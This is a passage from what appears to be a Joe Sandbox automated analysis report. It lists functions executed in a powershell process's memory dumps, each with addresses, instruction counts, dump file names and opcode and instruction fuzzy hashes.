                          • Instruction Fuzzy Hash: FF71C263A8E7D3CFF7134B6D99A90D67FA1EF5325430A40FBD0C98A093D914580A97A1

                          Executed Functions

                          Function 00007FFAAC6331D2 Relevance: .6, Instructions: 568COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000006.00000002.1389065754.00007FFAAC630000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC630000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_6_2_7ffaac630000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 5732f707043e1899a6ff81148c74743cbee43996e7603c146f0d64e5a4ff2dfd
                          • Instruction ID: cf00d00bf881d6c5488b3c6a7c581f54742be4b84cf3a596d25b1bb5816feca5
                          • Opcode Fuzzy Hash: 5732f707043e1899a6ff81148c74743cbee43996e7603c146f0d64e5a4ff2dfd
                          • Instruction Fuzzy Hash: CB022361A0EBCA8FF797D76C88545B57FE0EF56210B1861FAD04DCB193DA18E80AC391
                          Function 00007FFAAC567B63 Relevance: 1.3, Strings: 1, Instructions: 62COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000006.00000002.1388601744.00007FFAAC560000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC560000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_6_2_7ffaac560000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID: TP_L
                          • API String ID: 0-1272849785
                          • Opcode ID: a58c08552807a8321d7402f9eba03c898512b638d4ec4bed8c4ffd2e3c4f5ff9
                          • Instruction ID: 577484a94b3316cdb184b057c345d8e81fd1be02b860588342db44fcc2b1874a
                          • Opcode Fuzzy Hash: a58c08552807a8321d7402f9eba03c898512b638d4ec4bed8c4ffd2e3c4f5ff9
                          • Instruction Fuzzy Hash: F211D661A0D506CFF788AB3484297B8B6D7EF56340F4841BEF40EC72D3ED28A8498785
                          Function 00007FFAAC630000 Relevance: .7, Instructions: 747COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000006.00000002.1389065754.00007FFAAC630000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC630000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_6_2_7ffaac630000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 3db0b5d58cc2f8105bb484544c226328cb9b2711f0ad553d46d683ca0f3a0a9f
                          • Instruction ID: 910c543aa52f1b02a9306c1190163b1fb0cf260166c7618095163f40b697b184
                          • Opcode Fuzzy Hash: 3db0b5d58cc2f8105bb484544c226328cb9b2711f0ad553d46d683ca0f3a0a9f
                          • Instruction Fuzzy Hash: 0932D462A0EBCA8FF796DB6848555B57BE0EF57210B0861FBD04DCB293DA189C0DC391
                          Function 00007FFAAC636835 Relevance: .7, Instructions: 740COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000006.00000002.1389065754.00007FFAAC630000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC630000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_6_2_7ffaac630000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 645a852cb4e82ae73632b238ad756834e57eedb6535e2a8815b6813e1d6df16d
                          • Instruction ID: fb29a43d89e95f6ae78621bb04d3436a68d9e1ba787730c4a1e89b7a806c8a4e
                          • Opcode Fuzzy Hash: 645a852cb4e82ae73632b238ad756834e57eedb6535e2a8815b6813e1d6df16d
                          • Instruction Fuzzy Hash: B822E26190E7C68FE79BD72888655603FE0EF67210B1950FED08DCB2E3D919D84AC792
                          Function 00007FFAAC637D9D Relevance: .7, Instructions: 664COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000006.00000002.1389065754.00007FFAAC630000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC630000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_6_2_7ffaac630000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 7e0d9a9484312fb5eccbfc9958e329944b85cd54e1e7486fa1d6b88c40feb45a
                          • Instruction ID: 9da8d3d223cec10ad767eccede1e6757ae063c33dfbe597eee81fd5ba15447a2
                          • Opcode Fuzzy Hash: 7e0d9a9484312fb5eccbfc9958e329944b85cd54e1e7486fa1d6b88c40feb45a
                          • Instruction Fuzzy Hash: 2D120362A0EBCA8FE796D72848545F57BE1EF9B210B0891BBD44DC72D3DE189C09C391
                          Function 00007FFAAC630644 Relevance: .5, Instructions: 477COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000006.00000002.1389065754.00007FFAAC630000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC630000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_6_2_7ffaac630000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 46a8137e456aec6ea2013e9f2a90770da1f20a986154d8a4437e22237709cb2d
                          • Instruction ID: 177197f25128dc5d4c19e12bbb83efca02f5f7d166db255312531c76662f618b
                          • Opcode Fuzzy Hash: 46a8137e456aec6ea2013e9f2a90770da1f20a986154d8a4437e22237709cb2d
                          • Instruction Fuzzy Hash: 7CE1F57190EBC98FE75ADB2888556653FE0EF47310F0861BAD48DC7293DA29E84D87C1
                          Function 00007FFAAC63038E Relevance: .2, Instructions: 175COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000006.00000002.1389065754.00007FFAAC630000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC630000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_6_2_7ffaac630000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 0a1aa89ec546abe70cd545dd399ccbc50896402bc034072d1d0746a4747394f2
                          • Instruction ID: cbc3f7f95fda2ec3e3784c21d8bb59a255fd4350e8779d4b7bdac00d954abe96
                          • Opcode Fuzzy Hash: 0a1aa89ec546abe70cd545dd399ccbc50896402bc034072d1d0746a4747394f2
                          • Instruction Fuzzy Hash: CA51E922A0DB8ACFF796DB6844555747BE0EF56210B49A1FAD00DC7293EA68DC0DC790
                          Function 00007FFAAC637E6A Relevance: .1, Instructions: 140COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000006.00000002.1389065754.00007FFAAC630000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC630000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_6_2_7ffaac630000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 4bb7a8f4b6b648af370525716aa6a3210aeecb66bb8cbe5d3b344561387816cf
                          • Instruction ID: 1148ca90aa2a3f6e2e43a66169e80ebe7b03f405f07d751c7deea554a8d87745
                          • Opcode Fuzzy Hash: 4bb7a8f4b6b648af370525716aa6a3210aeecb66bb8cbe5d3b344561387816cf
                          • Instruction Fuzzy Hash: 9741D552E0FAC7CBF79AD72809651F9AAC1EF96251B58A0BDD44EC32D3DD08DC0982C1
                          Function 00007FFAAC565D35 Relevance: .0, Instructions: 49COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000006.00000002.1388601744.00007FFAAC560000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC560000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_6_2_7ffaac560000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 6b67da0f91cf9adf9124474dd058edfc4dc2c2a2611ed377a7a6356c2b5a25d8
                          • Instruction ID: d6dda814797866c3aa381bfba6600a7d3846f190b9ef17fc573fdf5db986c295
                          • Opcode Fuzzy Hash: 6b67da0f91cf9adf9124474dd058edfc4dc2c2a2611ed377a7a6356c2b5a25d8
                          • Instruction Fuzzy Hash: 6101A77114CB0C8FDB44EF0CE051AA5B3E0FB85320F10052DE58AC36A1DA32E881CB45